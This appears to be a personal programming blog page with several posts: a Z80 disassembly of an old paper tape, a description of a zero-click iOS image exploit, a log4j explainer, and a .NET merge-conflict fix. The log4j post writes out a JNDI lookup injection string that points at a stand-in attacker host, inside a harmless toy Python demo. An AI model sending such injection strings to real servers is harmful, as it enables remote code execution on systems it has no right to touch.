
Symbolic Forest

A homage to loading screens.

Blog : Posts tagged with ‘programming’

The Paper Archives (part two)

More relics from the past

The previous post in this series is here.

Spending some more time going through the things The Parents should arguably have thrown out decades ago, I came across a leather bag, which seemed to have belonged to my father. Specifically, he seemed to have used it for going to college, in the 1970s. Him being him, he’d never properly cleaned it out, so it had accumulated all manner of things from all across the decade. There were “please explain your non-attendance” slips from 1972; an unread railway society magazine from 1977; and the most recent thing with a date on was an Open University exam paper from 1983. It was about relational database design, and to be honest some of the questions wouldn’t be out of place in a modern exam paper if you asked for the answers in SQL DDL rather than in CODASYL DDL, so I might come back to that and give it its own post. What he scored on the exam, I don’t know. There were coloured pencils, and an unopened packet of gum.

Juicy Fruit gum

It seems to be from before the invention of the Best Before date, but the RRP printed on the side is £0.04.

Slightly more expensive: a rather nice slide rule. Look, it has a Standard Deviation scale and all. Naturally, my dad being my dad, it was still in its case and with the original instruction book, which will be useful if I ever try to work out how to use it.

Slide rule

And finally (for today) I spotted what appeared to be a slip of paper at the bottom of the bag with “NEWTON’S METHOD” written on it in small capitals, in fountain-pen ink. Had he been cheating in his exams? Had he written a crib to the Newton-Raphson method down and slipped it into the bottom of the bag? I pulled it out and…I was wrong.

Paper tape

It was a rolled-up 8-bit paper tape! Presumably with his attempt at a program to numerically solve a particular class of equation using Newton’s method.

I don’t know what type of machine it would have been written for, but I could see that it was likely binary data or text in some unfamiliar encoding, as whichever way around you look at it a good proportion of the high bits would be set so it was unlikely to be ASCII. Assuming I’m holding the tape the right way round, this is a transcription of the first thirty-two bytes…
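The high-bit argument is easy to check mechanically. Here is a minimal Python sketch, assuming my hex transcription below is accurate. It counts the bytes with bit 7 set, a bit that 7-bit ASCII on its own never uses.

```python
# The first thirty-two bytes, as transcribed from the tape.
TAPE_HEX = (
    "0A 8D 44 4E C5 A0 35 B8 0A 8D 22 30 A0 59 42 A0 "
    "47 4E C9 44 C9 56 C9 44 22 A0 D4 4E C9 D2 50 A0"
)

def high_bit_count(data: bytes) -> int:
    """Count bytes with bit 7 set; plain 7-bit ASCII never sets it."""
    return sum(1 for b in data if b & 0x80)

tape = bytes.fromhex(TAPE_HEX)  # fromhex ignores the spaces between pairs
print(f"{high_bit_count(tape)} of {len(tape)} bytes have the high bit set")
# prints "15 of 32 bytes have the high bit set"
```

Nearly half the bytes, in other words, which is not what you would see from ordinary 7-bit text.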

0A 8D 44 4E C5 A0 35 B8 0A 8D 22 30 A0 59 42 A0 47 4E C9 44 C9 56 C9 44 22 A0 D4 4E C9 D2 50 A0

That’s clearly not ASCII. In fact, I think I know what it might be: an 8080/Z80 binary. I recognise those repeated C9 bytes: that’s the 8080/Z80 opcode for the ret instruction. The ret instruction itself has survived all the way through to the modern-day x64 instruction set, although there its opcode is C3. If I try to hand-disassemble those few bytes assuming it’s Z80 code we get:

ld a,(bc)
adc a,l
ld b,h
ld c,(hl)
push bc
and b
dec (hl)
cp b
ld a,(bc)
adc a,l

This isn’t the place to go into Z80 assembler syntax (that might be a topic for the future), other than to say that the destination operand comes first and brackets are a pointer dereference, so ld c,(hl) means “put the value from the memory location whose address is in register hl into register c”. As valid code it doesn’t look too promising to my eyes (I didn’t even realise dec (hl) was something you could do), but I’ve never been any sort of assembly language expert. The “code” clearly does start off making assumptions about the state of the registers, but on some operating systems that would make sense. This disassembly only takes us as far as the repeated 0A 8D, though: maybe that’s some sort of marker separating segments of the file, and the actual code is yet to come. The disassembly continues…
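To make the direction of data flow concrete, here is a toy Python model of a couple of Z80 registers and a scrap of memory. The register values and memory contents are invented purely for illustration and aren’t taken from the tape. In Z80 syntax the destination is written first, so ld c,(hl) reads memory and ld (hl),c writes it.

```python
# Toy machine state: hypothetical values, chosen only for the demonstration.
regs = {"c": 0x00, "hl": 0x8000}
memory = {0x8000: 0x42}

def ld_c_from_hl_indirect(regs: dict, memory: dict) -> None:
    """ld c,(hl): read the byte at the address held in hl into register c."""
    regs["c"] = memory[regs["hl"]]

def ld_hl_indirect_from_c(regs: dict, memory: dict) -> None:
    """ld (hl),c: write register c into the byte at the address held in hl."""
    memory[regs["hl"]] = regs["c"]

ld_c_from_hl_indirect(regs, memory)
print(hex(regs["c"]))  # 0x42
```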

ld (&a030),hl
ld e,c
ld b,d
and b
ld b,a
ld c,(hl)
ret
ld b,h
ret
ld d,(hl)
ret
ld b,h
ld (&d4a0),hl
ld c,(hl)
ret
jp nc,&a050

Well, that sort of makes some sort of sense. Two of the three instructions that reference fixed addresses point to a consistent place in the address space, the block starting around &a000. The odd one out is the store to &d4a0 (the Z80 keeps 16-bit addresses low byte first, so 22 A0 D4 means &d4a0, not &a0d4). It also implies code and data are in the same address space, which means you’d expect some of the binary not to make sense when disassembled. If this were some other arbitrary data, I’d expect references like that to be scattered around at random locations. As the label says this is an implementation of Newton’s method, we can probably assume that this is a college program that includes an implementation of some mathematical function, an implementation of its first derivative, and the Newton’s method code that calls the first two repeatedly to find a root of the first. I wouldn’t expect it to be so sophisticated as to be able to operate on any arbitrary function, or to work out the derivative function itself.
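For anyone who hasn’t met it, here is a minimal Python sketch of the structure described above: a function, its hand-written first derivative, and a Newton’s method loop that repeatedly applies x := x - f(x)/f'(x) until the steps become tiny. The function x³ - 2x - 5 is a hypothetical stand-in. What the tape actually computes is unknown.

```python
def f(x: float) -> float:
    """Hypothetical example function: x^3 - 2x - 5."""
    return x**3 - 2 * x - 5

def f_prime(x: float) -> float:
    """Its first derivative, worked out by hand: 3x^2 - 2."""
    return 3 * x**2 - 2

def newton(func, deriv, x0: float, tol: float = 1e-12, max_iter: int = 50) -> float:
    """Repeat x <- x - func(x)/deriv(x) until the step is smaller than tol."""
    x = x0
    for _ in range(max_iter):
        d = deriv(x)
        if d == 0:
            raise ZeroDivisionError("derivative is zero; Newton's method cannot continue")
        step = func(x) / d
        x -= step
        if abs(step) < tol:
            return x
    raise RuntimeError("did not converge")

root = newton(f, f_prime, x0=2.0)
print(root)
```

Note that the derivative is supplied as a separate, hand-written function, as I’d expect of a 1970s college exercise. Nothing here works it out automatically.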

If I could find jumps or calls pointing to the instructions after those ret opcodes, I’d be happier. Maybe, if I ever have too much time on my hands, I’ll try to disassemble the whole thing.
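The hand-disassembly can be mechanised, at least for the stretch transcribed above. This is a minimal Python sketch. The opcode table covers only the instructions that actually occur in these thirty-two bytes, not the whole Z80 instruction set, and anything else is printed as a raw db byte. The Z80 stores a 16-bit address operand low byte first, which is why the two three-byte instructions rebuild the address as low | (high << 8).

```python
# Only the opcodes that occur in this particular stretch of tape; a real Z80
# disassembler would need the full table plus the CB/DD/ED/FD prefixes.
ONE_BYTE = {
    0x0A: "ld a,(bc)", 0x35: "dec (hl)", 0x42: "ld b,d", 0x44: "ld b,h",
    0x47: "ld b,a", 0x4E: "ld c,(hl)", 0x56: "ld d,(hl)", 0x59: "ld e,c",
    0x8D: "adc a,l", 0xA0: "and b", 0xB8: "cp b", 0xC5: "push bc", 0xC9: "ret",
}
# Opcodes followed by a 16-bit address, stored low byte first (little-endian).
THREE_BYTE = {
    0x22: "ld (&{:04x}),hl",
    0xD2: "jp nc,&{:04x}",
}

def disassemble(code: bytes) -> list[str]:
    out = []
    i = 0
    while i < len(code):
        op = code[i]
        if op in ONE_BYTE:
            out.append(ONE_BYTE[op])
            i += 1
        elif op in THREE_BYTE and i + 2 < len(code):
            addr = code[i + 1] | (code[i + 2] << 8)  # low byte, then high byte
            out.append(THREE_BYTE[op].format(addr))
            i += 3
        else:
            out.append(f"db &{op:02x}")  # not in our table: emit as raw data
            i += 1
    return out

tape = bytes.fromhex(
    "0A 8D 44 4E C5 A0 35 B8 0A 8D 22 30 A0 59 42 A0 "
    "47 4E C9 44 C9 56 C9 44 22 A0 D4 4E C9 D2 50 A0"
)
for line in disassemble(tape):
    print(line)
```

The natural next step would be to collect every jp and call target from the full tape and see whether any of them land just after one of those ret instructions.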

The next post in this series is here.

Teaching an image to think

Computers work in unexpected ways

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it, all their phone has to do is receive it and the hacker can take their phone over. At least, it could: this security hole was fixed three months ago, in iOS 14.8. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever whatever the GIF itself actually says to do. It does this in an unhealthy way, though. When it opens the file to change it, it doesn’t matter if it’s not actually a GIF. The software will try to be clever and say “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these” and do it. Even if it’s not a GIF and therefore doesn’t really need to.
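In a GIF, looping is controlled by an optional block called the NETSCAPE2.0 application extension, whose loop count of 0 means “loop forever”. Here is a minimal Python sketch of the sort of rewrite described above, with one difference that matters: it checks the file’s signature first and refuses anything that isn’t a GIF. This is purely illustrative and is not how iOS actually does it. The byte search is also naive enough that, in principle, matching bytes inside the image data could fool it.

```python
# Signatures that every GIF file starts with.
GIF_MAGICS = (b"GIF87a", b"GIF89a")

# Start of the NETSCAPE2.0 application extension: extension introducer 0x21,
# application-extension label 0xFF, block size 11, the 11-byte identifier,
# then a 3-byte data sub-block whose first byte is 0x01. The two bytes after
# that are the loop count, little-endian; 0 means "loop forever".
NETSCAPE_HEADER = b"\x21\xff\x0bNETSCAPE2.0\x03\x01"

def force_infinite_loop(data: bytes) -> bytes:
    """Return a copy of a GIF with its loop count set to 0 (loop forever)."""
    # Check the signature first instead of guessing at some other format.
    if data[:6] not in GIF_MAGICS:
        raise ValueError("not a GIF; refusing to guess at another format")
    pos = data.find(NETSCAPE_HEADER)
    if pos == -1:
        # No loop extension, so the GIF plays once; a fuller version would add one.
        return data
    count_at = pos + len(NETSCAPE_HEADER)
    return data[:count_at] + b"\x00\x00" + data[count_at + 2:]
```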

Secondly, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to open embedded images that are in an obscure and rather out-of-date format (JBIG2) mostly used by fax machines. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now) so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does, though, is frankly brilliant. It uses the capabilities of the compression algorithm of this particular graphics format to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms means that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.*
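To give a feel for how computation can be assembled from nothing but Boolean operations, here is a minimal Python sketch of an 8-bit adder. Its arithmetic is done solely with AND, OR and XOR gates. It illustrates the general principle only and is not the exploit’s actual construction. Chain together enough gates like these, add somewhere to keep state, and you have the building blocks of a CPU.

```python
def full_adder(a: int, b: int, carry_in: int) -> tuple[int, int]:
    """One-bit full adder built only from AND, OR and XOR gates."""
    partial = a ^ b
    total = partial ^ carry_in
    carry_out = (a & b) | (partial & carry_in)
    return total, carry_out

def add(x: int, y: int, width: int = 8) -> int:
    """Ripple-carry adder: chain full adders, least significant bit first.
    The shifts just pick out and place bits (the "wiring"); the result wraps
    around at 2**width, like a real fixed-width register."""
    result, carry = 0, 0
    for i in range(width):
        bit, carry = full_adder((x >> i) & 1, (y >> i) & 1, carry)
        result |= bit << i
    return result

print(add(100, 55))   # 155
print(add(200, 100))  # 44, because 300 wraps around in 8 bits
```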

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few features that were originally intended to be handy, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as processing your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.
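The heart of the problem is a logger that interprets special syntax inside the text it is asked to write, including text that came from the user. Here is a toy Python model of that mechanism. Every name in it is hypothetical: this is not log4j’s API (log4j is Java), and the jndi handler here merely records the address it would have contacted instead of fetching anything.

```python
import os
import re

# A toy logger that expands ${prefix:key} "lookups" anywhere in the final
# message, including inside values that came from the user.
LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")
would_fetch: list[str] = []

def resolve(match: re.Match) -> str:
    prefix, key = match.group(1), match.group(2)
    if prefix == "env":
        return os.environ.get(key, "")
    if prefix == "jndi":
        # The real vulnerability fetched and ran code from this address;
        # the toy only records it.
        would_fetch.append(key)
        return ""
    return match.group(0)  # unknown prefix: leave the text as it was

def log_info(message: str) -> str:
    line = LOOKUP.sub(resolve, message)
    print(line)
    return line

# The browser's User-Agent string is chosen by whoever sends the request.
user_agent = "${jndi:ldap://attacker.example/a}"
log_info(f"user etoainshrdlu checked balance; browser={user_agent}")
print(would_fetch)  # ['ldap://attacker.example/a']
```

The developer only ever wrote a harmless-looking log message; the dangerous part arrived inside the browser field.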

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Technical advice post of the week

Or, what to do with a particular compilation problem

This week, Microsoft released .NET 5, and it reminded me I’ve been meaning to post a piece of technical advice that has bitten me a few times but which doesn’t seem to be very well-documented or well-described online. It’s advice, though, that will slowly fade in relevance because it’s about .NET Framework; so I thought I should put it up here whilst it is still helpful to people.

(Note for non-technical readers, who are used to photos of trains and cemeteries and probably won’t find this post very interesting: .NET 5 is the latest version of .NET Core, which is the replacement for .NET Framework, hence Microsoft have dropped “Core” from the name to try to make that clearer. .NET 5 is the successor to .NET Core 3.1. There was never a .NET Core 4, because many versions of .NET Framework 4.x were, and still are, very heavily used, so Microsoft thought reusing the number 4 would be just Too Confusing. Are you less confused now?)

This problem, too, is pretty much specific to people working in teams. It only happens (well, I’ve only seen it happen) if all of the following apply:

  • you’re working in parallel in a team, on a complex system, probably one whose solutions contain a relatively large number of projects
  • you’re using the MSBuild tool as part of your continuous integration pipeline, deployment process, or similar
  • you’re using Git as your version control system

The symptoms of the problem are:

  • You can open the solution in Visual Studio and build it with no problems
  • When MSBuild tries to build the solution, it immediately errors, claiming that the solution file has a syntax error on line 2.

Spoiler: there is no syntax error on line 2.

Another note for non-technical readers who are still here: what you might think of loosely as a programming project, in any kind of .NET flavour, has a primary file called a “solution” (its name ends in .sln). The solution contains one or more “projects”; each project contains code. Visual Studio can open your solution file and your project files and turn the projects into some sort of output product, such as a program, a website, a code library or whatever. However, you don’t have to use Visual Studio to do this. .NET Framework has a program called MSBuild that does the same thing. If you have automated your build process (which if you’re working in a team you probably should) and you’re using .NET Framework, your build process will probably use MSBuild to do its work. What happens here is one of a range of problems called “well it worked on my machine”. A developer has code that seems to be in a happy, working state, they upload their code to the team’s server, the automated build process runs, and the automated build process falls over and says it doesn’t work.

The cause of the problem is: two people on the team have added different projects to the solution, in parallel. Now, Git is often quite good, when two people change code at the same time, at either working out how to merge the changes together, or at least, asking you to sort the situation out manually. This, though, is a situation where Git does the wrong thing and breaks your solution file—but it breaks it in a way that only MSBuild notices, and that Visual Studio happily ignores.

The reason this happens is down to the syntax of solution files. The part which lists the projects they contain looks a bit like this:

Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Important.Project.Library", "Important.Project.Library\Important.Project.Library.csproj", "{E6FF8E04-A41D-446B-9F8A-CCFAF4B08AD2}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Important.Project", "Important.Project\Important.Project.csproj", "{9A7E2940-50B8-4F3A-A535-AB6220E6CE3A}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Important.Project.Tests", "Important.Project.Tests\Important.Project.Tests.csproj", "{68035DDB-1C24-407C-B6B3-32CEC1D964E5}"
EndProject

Don’t worry too much about what each line says: the important thing to spot is that each project has a pair of lines: a Project(...) = line that contains the important information, and an EndProject line that, er, doesn’t. The projects are in a fairly arbitrary order, too; on your screen in Visual Studio they get sorted alphabetically, but that isn’t reflected in the file, where they are in the order they were added in.

The real cause of the problem is that Git doesn’t know that every Project... has to be followed by an EndProject. So, imagine two people have added new, different projects to the solution file. Git sees this and thinks: Alice has added Project... to line 42, and Bob has added a different Project... to line 42. So I’ll make those into lines 42 and 43. Alice added EndProject to line 43, and so did Bob, so I’ll just pop that in as line 44. So you get this:

Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Alices.Library", "Alices.Library\Alices.Library.csproj", "{0902233A-3857-4E5E-99F4-54F3F5E695E5}"
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bobs.Library", "Bobs.Library\Bobs.Library.csproj", "{56ABE9BB-1373-43D3-B1C5-1526E443AD73}"
EndProject

Visual Studio is quite unperturbed by this. MSBuild, however, doesn’t like it at all. It reads the file, realises there’s a Project without a matching EndProject, and falls over. For some reason, it always complains that the error is on line 2, even though it isn’t anywhere near line 2.
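Spotting the broken entry yourself is straightforward. Here is a minimal Python sketch of the kind of check MSBuild effectively makes here (it is not MSBuild’s actual parser). It walks the file and flags any Project(...) line that reaches another Project(...) line, or the end of the file, with no EndProject in between. Nested ProjectSection / EndProjectSection lines are ignored because they don’t match either test.

```python
def unmatched_projects(sln_text: str) -> list[int]:
    """Return 1-based line numbers of Project(...) lines that are not closed
    by an EndProject before the next Project(...) line or the end of file."""
    problems = []
    open_line = None  # line number of the currently open Project, if any
    for number, line in enumerate(sln_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("Project("):
            if open_line is not None:
                problems.append(open_line)
            open_line = number
        elif stripped == "EndProject":
            open_line = None
    if open_line is not None:
        problems.append(open_line)
    return problems
```

Run against the merged fragment above, it would report the line holding Alice’s project, because Bob’s Project(...) line follows it with no EndProject in between.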

The fix for this, as you might have guessed, is to open up the solution file in a text editor and manually enter that missing EndProject line after Alice’s project. And that’s it. Or, if you don’t feel comfortable going in and hacking your solution file directly, remember I said that Visual Studio is completely unfazed by this? You can make some sort of small change in Visual Studio that will imply a different change to the solution file: for example, tell it not to build one of the projects in one of the build configurations. Visual Studio doesn’t just change that bit, it will write out the whole file from scratch, so the problem gets silently fixed for you. Which one is less work depends on which one you’re happier doing, to be honest.
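If you have several solution files to repair, the manual fix can be scripted. Here is a minimal Python sketch, assuming the only damage is the kind described above. It adds an EndProject wherever a Project(...) line is followed by another Project(...) line, or by the Global section, with no EndProject in between, and it keeps the file’s existing line endings.

```python
def add_missing_endprojects(sln_text: str) -> str:
    """Close any Project(...) entry left open by a bad merge."""
    newline = "\r\n" if "\r\n" in sln_text else "\n"
    fixed = []
    project_open = False
    for line in sln_text.splitlines():
        stripped = line.strip()
        starts_block = stripped.startswith("Project(") or stripped == "Global"
        if starts_block and project_open:
            fixed.append("EndProject")  # close the project the merge left open
            project_open = False
        if stripped.startswith("Project("):
            project_open = True
        elif stripped == "EndProject":
            project_open = False
        fixed.append(line)
    if project_open:
        fixed.append("EndProject")
    trailing = newline if sln_text.endswith("\n") else ""
    return newline.join(fixed) + trailing
```

To use it on a real file, you would read and write with open(path, encoding="utf-8-sig", newline=""), so that the byte-order mark solution files usually start with and the CRLF line endings both survive the round trip.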

That’s the abstruse technical post over for now. Next time I write one, I’ll see if I can find something even more technically obscure.

Masochism

In which we go back to BASICs

No, I’m not a masochist.

I take a strange, geeky, masochistic pleasure, though, in making things hard for myself. In doing computer-based things the long way round. In solving the problems that are probably easy for some people, but hard for me. In learning new things just because it’s a new challenge.

Today, I was wrestling with a piece of Basic code in an Excel spreadsheet. I’ve not touched Basic since it had line numbers, which is a long long time ago, and I barely know any of it. I forced myself to work out, though, how to do what I wanted.* It was mentally hard work, and meant a lot of looking back and forth to the help pages, but I got it done in the end. It might not be written in the best way, the most efficient way, or the most idiomatic way.** But doing it was, strangely, fun.

* or, rather, what the consultant I was assisting wanted.

** for non-geeks: every computer language or system has its own programming idioms, which fit certain ways of programming particular problems. Someone used to language A will, on switching to language Z, often keep on programming in language A’s style even if this produces ugly and inefficient code in the other language.
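For the curious, here is a tiny illustration in Python, picked only because it’s compact. Both halves compute the same total. The first, though, is written the way someone used to an older language with explicit counters might write it, and the second is how Python programmers would normally say it.

```python
numbers = [3, 1, 4, 1, 5, 9, 2, 6]

# "Language A" habits carried into Python: manual index bookkeeping.
total = 0
i = 0
while i < len(numbers):
    total = total + numbers[i]
    i = i + 1

# The idiomatic Python way to say the same thing.
idiomatic_total = sum(numbers)

print(total, idiomatic_total)  # 31 31
```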